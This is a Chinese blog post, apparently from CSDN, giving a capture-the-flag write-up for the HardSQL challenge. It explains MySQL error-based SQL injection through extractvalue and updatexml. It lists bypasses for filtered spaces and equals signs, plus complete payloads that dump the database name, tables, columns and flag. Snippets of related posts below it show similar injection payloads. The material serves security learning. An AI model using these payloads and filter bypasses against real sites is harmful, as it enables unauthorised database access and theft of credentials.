报错注入extractvalue..之[极客大挑战 2019]HardSQL1

最新推荐文章于 2022-05-21 23:13:31 发布
最新推荐文章于 2022-05-21 23:13:31 发布
阅读量171 收藏
点赞数
分类专栏: CTF知识点 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/124172809
版权

首先总结知识点:

报错注入模板:

extractvalue(0x7e,concat(0x7e,(select database()))

updatexml(0x7e,(concat(0x7e,(select database())),0x7e)

这里过滤了空格和等号,当然还有其他的一些字符串;

0."="过滤绕过,用like代替“=”

1.空格绕过

需要用()绕过,就是除了操作字符比如select ,from where like,的库表段名用括号括起来

2.直接在123'extrcatvalue是不行的,需要使用or,或者^,

使用or 原本语句是or extractvalue……但空格需要()则是'or(extractvalue....)%23

使用^的话直接'^extractvalue(1,concat(查询语句),1)%23

3.left(),right()显现出其他内容

最后爆出字段的地方,只爆出了一部分;使用right(字段,大小)爆出;

完整payload:无空格绕过:

爆库名:

1'^extractvalue(0x7e,concat(1,(select database()),0x7e))%23

爆表名:

1'^extractvalue(1,concat(1,(select table_name from information_schema.tables where table_schema like 'geek'),0x7e))%23

爆字段:

1'^extractvalue(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name like 'H4rDsq1'),0x7e))%23

这里使用了group_concat()函数,作用是解决 :

爆内容:

1'^extractvalue(1,concat(1,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e))%23

但发现flag不完整:

使用right函数如下:

1'^extractvalue(1,concat(1,(select(right(group_concat(id,username,password),20))from(H4rDsq1)),0x7e))%23

 

一只Traveler
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sqlilabs Less-13
Light_inthe_eyes的博客
03-04 274
判断是单引号单括号字符型注入,并且成功注入时无回显,所以用报错注入: uname=admin')&passwd=&submit=Submit uname=admin')#&passwd=&submit=Submit 判断列数: uname=admin')+order+by+2#&passwd=&submit=Submit 爆库: uname=admin')+and+extractvalue(1,concat(0x7e,(select+database()
21、注入篇————MYSQL数据库Extravtvalue报错注入
Fly_鹏程万里
03-02 1545
MYSQL数据库Extravtvalue报错注入查询数据库版本信息http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))链接用户http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, ...
刷题笔记:SQL注入漏洞测试(报错盲注)
m0_67399862的博客
05-21 354
只用and 1=2页面正常,没有报错,但在id=1后加’,会发现页面报错,说明‘与前面的’闭合了 可考虑用报错盲注 运用id=1' and extractvalue(1,concat(0x7e,database()))) --+语句来查询数据库名,即stormgroup 运用id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema...
学习基于extractvalue()和updatexml()的报错注入
热门推荐
超人学飞的日子
06-09 5万+
extractvalue()extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报...
一天一道ctf 第17天(报错注入
scrawman的博客
03-30 313
[极客挑战 2019]HardSQL 这道题的知识点是extractvalue()和updatexml()报错注入 https://blog.csdn.net/zpy1998zpy/article/details/80631036 extractvalue()函数接受两个参数,我们主要在第二个参数上做文章。看下面的这个查询数据库的payload,我们传递第二个参数为concat(0x7e,(select(database())),0x7e是’~'的十六进制表示,concat用于拼接字符串。因为extrac
21.GeekPwn 2019极客大赛之安全攻防技术总结及ShowTime1
08-03
在本文中,我们将探讨2019年GeekPwn极客大赛中的安全攻防技术,这是一个展示最新网络安全技术的平台。作者通过亲身体验,分享了大赛中的亮点和精彩瞬间,涵盖了云安全、隐私保护、机器学习、智能设备安全等多个领域...
极客学院 idea教程 含2017.1版本 PDF及两个视频
11-16
【标题】"极客学院 idea教程 含2017.1版本 PDF及两个视频" 涵盖了IntelliJ IDEA的使用方法和实践,是针对2017.1版本的详细教学资源。IntelliJ IDEA是一款流行的Java集成开发环境(IDE),由JetBrains公司开发,广泛...
微信小程序-极客学院.zip
04-14
1. **页面生命周期**:每个小程序页面都有自己的生命周期,包括onLoad、onShow、onHide等方法,用于在特定时刻执行相应的函数,如加载数据、显示或隐藏页面。 2. **数据绑定**:WXML与JS之间通过数据绑定实现交互。...
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
sqli-labs第11-20关
永远相信美好的事情即将发生
12-15 3806
Less-11 进入后是个登录页面,应该是基于post的注入,这边准备用hackbar注入,方便一点。看一下源码,两个框的名字分别是uname和passwd 先提交1试试效果 登陆失败,再加一个单引号试试,密码框不输(若是输入密码,报错出来的信息更少;也可同时输入单双引号,这个效果一样) 有报错回显,存在注入,且回显的错误为:‘1’’ and password=’’ LIMIT 0,1。其中1’是我输进去的,另外还有成对的单引号出现,可以看出是字符型。由此猜测sql语句为:select usernam
sql报错注入
MSB_WLAQ的博客
09-29 248
基于格式错误的报错(xpath语法错误) extractvalue(): 函数使用格式:extractvalue(xml_document,Xpath_string),作用是从document中返回包含string的字符串,如果string参数不符合xpath的语法就会报错,将查询的结果放在报错信息里. id='and(select extractvalue("anything",concat('~',(select语句)))) 分析:因为~符号不符合xpath的语法规则所以导致报错返回select
SQL注入报错注入函数
lightsec
03-15 1万+
前言 报错注入的前提是当语句发生错误时,错误信息被输出到前端。其漏洞原因是由于开发人员在开发程序时使用了print_r (),mysql_error(),mysqli_connect_error()函数将mysql错误信息输出到前端,因此可以通过闭合原先的语句,去执行后面的语句。 常用报错函数 updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数 extractvalue() 是mysql对xml文档数据进行查询的xpa...
2021-01-18
weixin_45642610的博客
01-18 371
来到sql注入骚姿势,我们一点一点开始学 我们来到这道题,然后尝试注入,结果发现 拼接’or ‘1’='1 'or ‘1’='2如果是字符型注入则会报错,然而并没有而是显示的页面一样, 通过常规注入,回显的页面都是 最后,我们发现这道题是xpath报错注入,函数注入 extractvalue() extractvalue() :对XML文档进行查询的函数 语法:extractvalue(目标xml文档,xml路径) 第一个参数 : 第一个参数可以传入目标xml文档 第二个参数: xml中的位置是可操作
sql注入中报错注入函数extractvalue和updatexml函数的原理及使用
weixin_46145442的博客
11-28 6614
故意拼接两个函数错误的Xpath字符串,使其报错并返回payload执行结果。
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1088
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
报错注入分析之Extractvalue分析
aiquan9342的博客
01-04 1055
Extractvalue(这单词略长,拆分记忆法extract:提取物 value:值) 上一篇说的是updatexml。updatexml是修改的。而evtractvalue是查询的。 用法与updaxml类似。 同updatexml一样,限制长度也是32位。 函数解释:  extractvalue():从目标XML中返回包含所查询值的字符串。  EXTRACT...
BUUCTF [极客挑战 2019]HardSQL
m0_63253040的博客
03-28 2398
还是这个熟悉的登录页面 尝试万能密码登录,发现有过滤,一个一个试 过滤了空格,=,等等许多,双写也无法绕过,那么换报错注入试试
SQL注入详解 11-22关
君莫hacker的博客
09-28 819
目录Less-11(POST传参,联合注入)Less-12(floor报错注入)Less-13(updatexml()报错注入)Less-14 Less-11(POST传参,联合注入) 第11关总结: 第十一关与前面的关卡不太相同,这里采用了POST传参,我们需要借助浏览器插件或者抓包工具对其参数进行修改。用户名与密码均为admin,登录成功后会回显出用户名及密码,所以我们可以尝试在参数uname与参数passwd处尝试进行注入,经过判断,发现在参数uname处存在单引号字符型注入,并且有回显能判断出字段
[极客挑战 2019]EasySQL 1
最新发布
08-24
[极客挑战 2019]EasySQL 1是一道SQL注入题目。根据引用和引用中的示例,可以看出在payload中通过在注入点添加"or 1=1#"实现绕过了原本的认证逻辑,使得查询返回的结果总是为真。这样攻击者可以通过注入恶意代码来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值